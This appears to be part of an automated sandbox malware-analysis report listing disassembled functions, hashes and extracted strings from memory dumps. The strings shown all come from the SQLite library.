Instruction Fuzzy Hash: 0281C021E0FA437AFE54AB6694412B97290EF857C0F458035D96C833E6DF3CE8658728

Function 00007FF8A87219A0 Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 478COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A8721A6C

Strings

cannot open table without rowid: %s, xrefs: 00007FF8A8721FE4
cannot open view: %s, xrefs: 00007FF8A8721FDB
cannot open %s column for writing, xrefs: 00007FF8A8721FA9
cannot open virtual table: %s, xrefs: 00007FF8A8721FED
out of memory, xrefs: 00007FF8A8721AD8
indexed, xrefs: 00007FF8A8721C90
foreign key, xrefs: 00007FF8A8721C43
no such column: "%s", xrefs: 00007FF8A8721FC7

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
API String ID: 4149376297-554953066
Opcode ID: 1932231faa3f000e4fb05286e58fa8bf6b81f2d0eaf89c5c08db61906353d3de
Instruction ID: 107b3292339d73814825229b6ce8dec3dcba5651a0b63ca32e6f4727a457132a
Opcode Fuzzy Hash: 1932231faa3f000e4fb05286e58fa8bf6b81f2d0eaf89c5c08db61906353d3de
Instruction Fuzzy Hash: 7C22C172A0AB81A6EB64DF25D4406BD77E4FB44BC8F405136DA8D47794EF38E890C724

Function 00007FF8A86F0CD0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON

Download Yara Rule

APIs

new[].MSPDB140-MSVCRT ref: 00007FF8A86F0DE7

Strings

:, xrefs: 00007FF8A86F0D01
:, xrefs: 00007FF8A86F0D3C
%s%c%s, xrefs: 00007FF8A86F0D46
winFullPathname1, xrefs: 00007FF8A86F0DCC
?, xrefs: 00007FF8A86F0D11
\, xrefs: 00007FF8A86F0D58
winFullPathname2, xrefs: 00007FF8A86F0E55

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: new[]
String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
API String ID: 4059295235-3840279414
Opcode ID: a207f01d118e0909cbb0d974f4ba2a02deab42a4a968a7174006491586c55b51
Instruction ID: 92c97b9249cc074f9c4d83e1b29f8d376e7ef1fd36ea8229fc1271862a8b1dde
Opcode Fuzzy Hash: a207f01d118e0909cbb0d974f4ba2a02deab42a4a968a7174006491586c55b51
Instruction Fuzzy Hash: 7951F721F0E683A6FB159B61A4086B96B91EF44BC8F486035DD4D07686DFBCFC418329

Function 00007FF8A86F2430 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 477COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A86F2A03

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FF8A86F256E, 00007FF8A86F2A8D
API called with NULL prepared statement, xrefs: 00007FF8A86F257D
%s at line %d of [%.10s], xrefs: 00007FF8A86F25CD, 00007FF8A86F2AA6
misuse, xrefs: 00007FF8A86F25C1, 00007FF8A86F2A9A
API called with finalized prepared statement, xrefs: 00007FF8A86F2599, 00007FF8A86F2A7E
PRAGMA "%w".page_count, xrefs: 00007FF8A86F250A

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API called with NULL prepared statement$API called with finalized prepared statement$PRAGMA "%w".page_count$misuse
API String ID: 4149376297-3885987512
Opcode ID: 1a1223a6a6bb04b4c8ff326a3c0eca170975add0c8d52055246356fb965cb68f
Instruction ID: 8313546eefbf371a61606882b31247ed0727df2c548ef37a2c9aa39f9d3a8175
Opcode Fuzzy Hash: 1a1223a6a6bb04b4c8ff326a3c0eca170975add0c8d52055246356fb965cb68f
Instruction Fuzzy Hash: EC129C22B0BA42A5FB649B2695583B927A1FF44FC8F146131CE0D07799DF7CE845CB28

Function 00007FF8A8706C30 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 311COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A8706D44
00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A8706ED7

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FF8A8707071
database corruption, xrefs: 00007FF8A870707E
%s at line %d of [%.10s], xrefs: 00007FF8A870708A

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 4149376297-3418467682
Opcode ID: bdc43c00e068bcf9daa4ee6eb075ee9cb8e10da1e134680c0aeee87e4ea49667
Instruction ID: 3d6cc09f7ea29cabd73c93bd330589579152c7f6d77315da95756aaa3d15463f
Opcode Fuzzy Hash: bdc43c00e068bcf9daa4ee6eb075ee9cb8e10da1e134680c0aeee87e4ea49667
Instruction Fuzzy Hash: A2D1CD7260A78696EB60CF29D014AA977B5FB88BC8F558036DF4D47394EF39E842C314

Function 00007FF8A8744DB0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 330COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A8744EFB

Strings

number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FF8A8744E5E
foreign key on %s should reference only one column of table %T, xrefs: 00007FF8A8744E35
unknown column "%s" in foreign key definition, xrefs: 00007FF8A874514C

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 4149376297-272990098
Opcode ID: 305c18b0e9f4f5604f50df11341a73f27d41104cfe2523d61a6f97d477ce37b0
Instruction ID: d75a82894296e848d5890338862c697948d125d147b3d784ad5912680a487c7e
Opcode Fuzzy Hash: 305c18b0e9f4f5604f50df11341a73f27d41104cfe2523d61a6f97d477ce37b0
Instruction Fuzzy Hash: E3D11372A4B792A2EB60CB9590447B97BA1FB45BC4F484131DE5E03796DF3CE441C718

Function 00007FF8A87676F0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 305COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00007FF8A8767F95,?,?,00000000), ref: 00007FF8A8767770

Strings

column%d, xrefs: 00007FF8A87678C5
%.*z:%u, xrefs: 00007FF8A8767986
rowid, xrefs: 00007FF8A8767848

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: %.*z:%u$column%d$rowid
API String ID: 4149376297-2903559916
Opcode ID: ff5d7ae2e35ebc63f28db2e85c6308ab8f11e9868eeecefcd88fb59e8b1ee1c9
Instruction ID: d97017d3a1c1bb66533740f1d2b58d384b9d77ed0d1e23291a3f251f066ef64c
Opcode Fuzzy Hash: ff5d7ae2e35ebc63f28db2e85c6308ab8f11e9868eeecefcd88fb59e8b1ee1c9
Instruction Fuzzy Hash: 3CC1EE22A4A782A6FA65CB1590847B967A2FF41FD4F189235DE5D077C5EF3CE801C328

Function 00007FF8A8737440 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 302COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A873756F
00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A8737622

Strings

"%w" , xrefs: 00007FF8A87374F0
%Q%s, xrefs: 00007FF8A8737794

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: "%w" $%Q%s
API String ID: 4149376297-1987291987
Opcode ID: ca2e05b37137fcc4391813ead9a867555ccaf8c8f05afeaa331b5fd03ba256d6
Instruction ID: 0569a0278180ee70cd8771eafaa4d60236728fdca944405fd67509a3c923f0ef
Opcode Fuzzy Hash: ca2e05b37137fcc4391813ead9a867555ccaf8c8f05afeaa331b5fd03ba256d6
Instruction Fuzzy Hash: B0C1DF72B4AB82A6EA14CF55A49067977A0FB45BE0F188235DE6E077D4DF3CE440C324

Function 00007FF8A87049C0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 260COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A8704B6E

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FF8A8704A05
database corruption, xrefs: 00007FF8A8704A11
%s at line %d of [%.10s], xrefs: 00007FF8A8704A1D

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 4149376297-3418467682
Opcode ID: 82fe7f8e495bb442f5ac7ed3b0b0151c88c7131e13f43762d2f490f0b7604a72
Instruction ID: 87204e52a0c3c3adc313af29cf362118edc34f7a1297ab89f1fea36e0ca688ca
Opcode Fuzzy Hash: 82fe7f8e495bb442f5ac7ed3b0b0151c88c7131e13f43762d2f490f0b7604a72
Instruction Fuzzy Hash: A7B1BE72B196A6A6EB60CB26A044B7A77A5FB84BC8F014135DF4D47B85EF3CD840C714

Function 00007FF8A8700410 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 253COMMON

Download Yara Rule

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FF8A870048C
database corruption, xrefs: 00007FF8A8700498
%s at line %d of [%.10s], xrefs: 00007FF8A87004A4

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 0-3418467682
Opcode ID: 692b6681af643018bed6e177934dcf0e75464141baee9d3c90cf30845b12c46b
Instruction ID: 4e8ec298330edff1a3559f414f3a9f1045a2fdd9188c84c566002e5492f9dd5d
Opcode Fuzzy Hash: 692b6681af643018bed6e177934dcf0e75464141baee9d3c90cf30845b12c46b
Instruction Fuzzy Hash: 1AA14432E0E2D1AAD724CB1994546BDBBA2EB81BD1F084135DB8B43786DF3CE545C724

Function 00007FF8A86EEEA0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 249COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A86EEF2C

Strings

%s-shm, xrefs: 00007FF8A86EEF43
readonly_shm, xrefs: 00007FF8A86EF0CA
winOpenShm, xrefs: 00007FF8A86EF139

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: %s-shm$readonly_shm$winOpenShm
API String ID: 4149376297-2815843928
Opcode ID: b07afea1859578fd4e42ec8a61cd900611d4e10773127c8a3f1c7d01da6d0bac
Instruction ID: fc533d192b786425c224c86841f1e456359d3a596a27bf92acfca88c9deb6778
Opcode Fuzzy Hash: b07afea1859578fd4e42ec8a61cd900611d4e10773127c8a3f1c7d01da6d0bac
Instruction Fuzzy Hash: 85C15A25B0BA42A7FF64AB61E4586B833A0FF48BD4F045675DA5E43690EF3CE444C368

Function 00007FF8A8700920 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A8700B49

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FF8A87009D7, 00007FF8A8700B6D
database corruption, xrefs: 00007FF8A87009E3, 00007FF8A8700B7A
%s at line %d of [%.10s], xrefs: 00007FF8A87009EF, 00007FF8A8700B86

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 4149376297-3418467682
Opcode ID: a4c113993474cc49555c3d143fb20371f08dc39ed5c52e61a988b440176aaf0e
Instruction ID: d7c0e415ece1a7b0b6eadf2e8e48ac7c1d5db3e89b4ba258bb18e822c6513dea
Opcode Fuzzy Hash: a4c113993474cc49555c3d143fb20371f08dc39ed5c52e61a988b440176aaf0e
Instruction Fuzzy Hash: D3812663A5E2D169E321CA25A0505BA3EE0E7117E5F05413AEECA473C1EB3CC986D728

Function 00007FF8A87364D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 215COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A8736694

Strings

virtual tables may not be altered, xrefs: 00007FF8A8736568
Cannot add a column to a view, xrefs: 00007FF8A8736584
sqlite_altertab_%s, xrefs: 00007FF8A873669D

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 4149376297-2063813899
Opcode ID: 07cb2e7851a56338389ab05e0a161e4c4c89749a912260004fa4f3a15ea2c57c
Instruction ID: a6fa306b402ed154504b9ec1668ffcc99e526dd5bbf5671da3933047751c3df6
Opcode Fuzzy Hash: 07cb2e7851a56338389ab05e0a161e4c4c89749a912260004fa4f3a15ea2c57c
Instruction Fuzzy Hash: 0191F1B2A0AB8192EB50CF15A014AB977A5FF89BC0F899235DE8D47785EF3CE451C314

Function 00007FF8A8091FD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A8092008
00007FF8C6126570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A8092026

Strings

CJK UNIFIED IDEOGRAPH-, xrefs: 00007FF8A809201C
HANGUL SYLLABLE , xrefs: 00007FF8A8091FF5

Memory Dump Source

Source File: 00000002.00000002.2333738469.00007FF8A8091000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A8090000, based on PE: true

Associated: 00000002.00000002.2333694134.00007FF8A8090000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A80F2000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A813E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A8142000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A8147000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A81A4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2333738469.00007FF8A81A7000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2334161636.00007FF8A81A8000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2334206076.00007FF8A81AA000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8090000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007C6126570
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 800424832-87138338
Opcode ID: 2595fa2025d07ddf98b647c638fd1ed7edd11107ba76c08aad6fbc153bf9cbc4
Instruction ID: cbc2d1b081dac8b81c005812da731f8893ac2f06f4d2350e394629a0866d8021
Opcode Fuzzy Hash: 2595fa2025d07ddf98b647c638fd1ed7edd11107ba76c08aad6fbc153bf9cbc4
Instruction Fuzzy Hash: A4617D72B0AE026EEB60CA15A80067E7252FF90BD0F449231EA6D437D5DF3CE421CB14

Function 00007FF8A86FA110 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 139COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A86FA238

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FF8A86FA2F2
database corruption, xrefs: 00007FF8A86FA2FF
%s at line %d of [%.10s], xrefs: 00007FF8A86FA30B

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: 00007A251730
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 4149376297-3418467682
Opcode ID: b2ad27d075e7604b728f310a1672e8df9373334c1e65e28f0ea737e03c5a8063
Instruction ID: 73638cfe8ead88fdf1d4166283dcdf07bca08541b9026912a72ebe0c4ba1b773
Opcode Fuzzy Hash: b2ad27d075e7604b728f310a1672e8df9373334c1e65e28f0ea737e03c5a8063
Instruction Fuzzy Hash: 5551CE3270AB42A6FB54CB25E549AA973A4FB48BC8F086032DF4D43754EF79E851C318

Function 00007FF8A86FBDF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMON

Download Yara Rule

APIs

00007FF8BA251730.VCRUNTIME140 ref: 00007FF8A86FBEC6

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FF8A86FBF60
database corruption, xrefs: 00007FF8A86FBF6D
%s at line %d of [%.10s], xrefs: 00007FF8A86FBF79

Memory Dump Source

Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true

Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
